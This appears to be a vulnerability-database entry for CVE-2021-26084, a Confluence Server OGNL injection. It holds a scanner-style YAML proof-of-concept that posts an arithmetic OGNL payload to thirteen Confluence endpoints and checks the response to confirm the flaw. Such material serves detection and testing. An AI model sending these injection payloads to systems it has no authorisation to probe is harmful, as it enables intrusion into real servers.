CVE-2021-26084: Confluence Server OGNL injection - RCE
日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开
漏洞描述
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
PoC代码[已公开]
id: CVE-2021-26084
info:
name: Confluence Server OGNL injection - RCE
author: Loneyer
severity: critical
description: |-
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
tags: cve,cve2021,confluence,rce
created: 2021/04/20
rules:
r0:
request:
method: POST
path: /pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r1:
request:
method: POST
path: /pages/createpage-entervariables.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r2:
request:
method: POST
path: /confluence/pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r3:
request:
method: POST
path: /confluence/pages/createpage-entervariables.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r4:
request:
method: POST
path: /wiki/pages/createpage-entervariables.action?SpaceKey=x
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r5:
request:
method: POST
path: /wiki/pages/createpage-entervariables.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r6:
request:
method: POST
path: /pages/doenterpagevariables.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r7:
request:
method: POST
path: /pages/createpage.action?spaceKey=myproj
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r8:
request:
method: POST
path: /pages/templates2/viewpagetemplate.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r9:
request:
method: POST
path: /pages/createpage-entervariables.action
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r10:
request:
method: POST
path: /template/custom/content-editor
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r11:
request:
method: POST
path: /templates/editor-preload-container
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
r12:
request:
method: POST
path: /users/user-dark-features
body: |
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
expression: response.status == 200 && response.body.bcontains(b'value="aaaa{140592=null}')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() || r10() || r11() || r12()